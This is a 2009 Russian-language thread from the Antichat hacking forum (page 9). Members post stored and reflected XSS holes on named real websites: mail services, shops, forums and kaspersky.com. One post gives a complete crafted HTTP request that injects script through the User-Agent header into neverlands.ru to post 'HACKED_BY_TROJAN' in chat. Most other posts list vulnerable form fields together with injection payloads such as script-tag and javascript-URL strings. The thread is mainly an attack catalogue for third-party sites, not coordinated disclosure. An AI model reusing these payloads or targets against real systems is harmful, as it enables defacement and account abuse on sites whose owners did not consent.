ANTICHAT
Страница 9 из 14 « Первая < 5 6 7 8 9 10 11 12 13 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

TR0J@N 27.01.2009 20:48
Активная XSS в NeverLands.ru
Вообщем давно обнаружил, ну думаю выложу)
Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!

Пример использования:

Код:
POST http://www.neverlands.ru/game.php HTTP/1.0
Accept: */*
Referer: http://www.neverlands.ru/index.cgi
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: <script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>
Host: www.neverlands.ru
Content-Length: 58
Pragma: no-cache
Cookie: watermark=МЕТКО

player_nick=ЛОГИН&player_password=ПАСС&x=1&y=1
Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим

Код:
ЛОГИН: HACKED_BY_TROJAN_http://s50.radikal.ru/i130/0901/82/ad5ae76cf1a4.gif
P.S. На момент публикации всё работает!

27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")

TROJAN (с)

iddqd 11.02.2009 22:02
И вновь i.ua

Сервис "Объявления" - board.i.ua
При заполнении формы уязвимо поле "Название товара"

Цитата:
http://board.i.ua/user/1435442/

lastsmile 13.02.2009 07:17
активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/)
регистрируемся на форуме
уязвимо поле ИМЯ

iddqd 18.02.2009 14:33
A.UA
В письме уязвимо поле "Тема".

gromoza 19.03.2009 14:10
Xss на http://jetswap.com/
 
PHP код:
http://go.jetswap.com/support 
Уязвимое поле тема.
Минус только один в течении примерно 10 часов служба поддержки обрабатывает ваш запрос и удаляет его.
З.Ы. У админов и службы поддержки скрипт не обрабатывается.

mailbrush 20.03.2009 18:07
Код:
http://autoportal.od.ua/?a=forum&p=1
Уязвивмы все поля.

gromoza 24.03.2009 17:05
PHP код:
demotivation.ru
Уязвимо поле коментария 
<IMG SRC="javascript:alert('XSS');"
http://demotivation.ru/0ixq1u1biut9pic.html
Пример

L I G A 24.03.2009 18:28
http://voiska.ru
PHP код:
уязвимое поле :название новости
http://voiska.ru/index.php?ind=news&op=news_show_category&idc=2 

L I G A 25.03.2009 13:10
www.tiensmed.ru
Код:
уязвимое: название новости
http://www.tiensmed.ru/news/upcoming/

L I G A 26.03.2009 14:12
http://www.chef.com.ua
Код:
уязвимое поле:коментарии
http://www.chef.com.ua/articles/588.html#comments

^YaHoo^ 13.04.2009 12:33
http://www.mobime.ru/
уязвимое поле коментарии

Evil_Grey 19.04.2009 12:50
http://sputnik.sg/rus/price/sg_tr.html

провайдер спутникового иннэта.
уязвимые поля:

Имя
mail
Comment

L I G A 22.04.2009 14:26
http://www.addtop.ru
Код:
http://www.addtop.ru/kom.php?id=32
уязвимое поле коментарии

L I G A 07.05.2009 20:21
www.3dtop.ru
уязвимое поле - коментарии
пример :
Код:
http://www.3dtop.ru/kom.php?id=23

wildshaman 10.05.2009 15:30
http://www.domashnii.ru/blogs/
Уязвимо поле логин и ник при регистрации, затем постим комменты, например:
http://www.domashnii.ru/blogs/posts/view/72/

L I G A 05.06.2009 12:37
totalfootball.ru
Уязвимое поле "коментраии"
пример:
Код:
http://totalfootball.ru/day.php?id=231

2pick 08.06.2009 12:57
http://dom2.ru
1. В редактировании пользователя в полях Фамилия, Имя, Город
2. При регистрации ника на странице инфо пользователя отображается в <title>
3. При отправке сообщений пользователям (при открытии письма) в поле тема

eLWAux 12.06.2009 17:01
http://filesurf.ru/
файлообменник

заливаем файл filename.html с содержимым:
<script>alert(/xss/);</script>

JOHNik 20.06.2009 15:23
http://indarnb.ru/
XSS в профиле
Уязвимы поля "Фамилия". "Имя" при регистрации.
Пример:
Цитата:
http://indarnb.ru/users/?userId=3397B6FC83F4F1EA&cityId=1

Calcutta 10.07.2009 13:08
магазин http://terabite.vn.ua
уязвимые поля Улица, Индекс, Страна, Телефон, Телефон 2, Факс, E-Mail при регистрации. так же имеются другие баги.

петрович 21.07.2009 11:27
http://i.ua
Активный XSS в теле письма:
Цитата:
<img src="javascript:alert()">
Просто до безобразия, keep it priv8 ;)

Inotsee 23.07.2009 20:02
Цитата:
Сообщение от петрович
http://i.ua
Активный XSS в теле письма:

Просто до безобразия, keep it priv8 ;)
там же во вкладке фото создаем альбом с названием: <script>alert("XSS")</script>. Жаль на маил.ру таких не осталось))

ZARO 03.08.2009 22:25
http://www.for.kg/ru/public_reporter/134/ . В коментарии вставляем "/><script>alert(/xss/)</script>

и получаем XSS

ZARO 03.08.2009 23:26
http://www.kazakh.ru/talk/mmess.phtml?idt=21316 Тут тоже самое, уязвимое поле коментария.

-JC- 08.08.2009 06:26
http://www.arsenal.com/ В поле поиска
http://www.arsenal.com/login в поле Username

xTray 12.08.2009 23:41
http://testskills.ru/ - в полях ввода имя,фамилия,очество,емаил

satana-fu 13.08.2009 02:33
Цитата:
Сообщение от Kusto
это пассивка

активка, поле коммент ;)
Цитата:
http://stylemania.km.ru/Modelnoe_portfolio/comment
"/><script>alert(/xss/)</script>

satana-fu 18.08.2009 04:11
активка в гостевой сайта Мульфильмы

Цитата:
http://www.multfilmy.ru/gesta/gesta.php
<img src="javascript:alert()">





Радио 20 (Активка)
Цитата:
http://station20.ru/track/923/
<img src="javascript:alert()">




Сайт Макса Фадеева (Активка )
Цитата:
http://www.fadeev.ru/gruppa-kitai-v-zhurnale-bravo#comments
"/><script>alert(/xss/)</script>






активка в поле имя и фамилия
Цитата:
http://www.kieves.com/index.shtml?titul=regist&dannye=1
"/><script>alert(/xss/)</script>

satana-fu 19.08.2009 15:12
активка

Цитата:
http://www.migrants.ru/messages/?page=1
http://www.migrants.ru/forum/theme.php?
Ваще никакого фильтра нет, пролазит любой скрипт можно так сказать, да плюс еще сообщения дублируются трижды

W@r.N0i$e 21.08.2009 14:44
http://www.bis.biysk.ru/index.phtml?/otzyv.phtml
Уязвимое поле: Тема.

satana-fu 26.08.2009 02:36
активка

Цитата:
http://behappy.etoja.ru/Naii-ieoao-b1/-b1-p5551.htm#form_comment_id_5551
"/><script>alert(/xss/)</script>

DFrost 26.08.2009 15:47
WWW.ZAYCEV.NET
Цитата:
http://forum.zaycev.net/index.php?showuser=674679
Активка в подписи(FIXED)
P.S. в поиске пассивка осталась

mailbrush 02.09.2009 19:42
Изволю себе запостить в этой теме Пассивную XSS на letitbit. Тему новую создавать не хочется, а сайт о огромный...

Код:
http://letitbit.net/tmpl/tmpl_frame_top.php?link="><script>alert()</script>

cremator (c) 10.09.2009 13:31
Код:
http://primkray.ru/sms/index.php
Active XSS in "Сообщение"

Код:
http://primkray.ru/bazar/zn_fl/index.php?a=form&id=
Active XSS in "Сообщение"

eLWAux 14.09.2009 15:04
активки и пасивки на укр@мейл сервисах
http://uasc.org.ua/2009/09/ua-mail-xss/

Epic wave 14.09.2009 23:05
http://www.nevesta-kino.ru/about/

в каждом поле

AKYLA 15.09.2009 03:45
http://www.kaspersky.com/downloads/flash/productlaunch.swf?productLaunch=javascript:alert(1 2345)
Ну или просто редирект можно на нужную страницу сделать ))

Ctacok 15.09.2009 20:40
rpgmaker.ru

[img]javascript:alert();[/img]

BlackSun 15.09.2009 21:02
forum.xakep.ru
Можно реализовать с помошью махинаций с тегами [url], [video], не раскручивал, кому интересно, могут добить сами.

mailbrush 16.09.2009 22:04
Код:
http://www.teko.ca/board/topic.php?id=666
Код:
name=Guest&comments=<script>alert('ANTICHAT FOREVER')</script>&email=human


Время: 06:03
Страница 9 из 14 « Первая < 5 6 7 8 9 10 11 12 13 > Последняя »
Показывать 40 сообщений этой темы на одной странице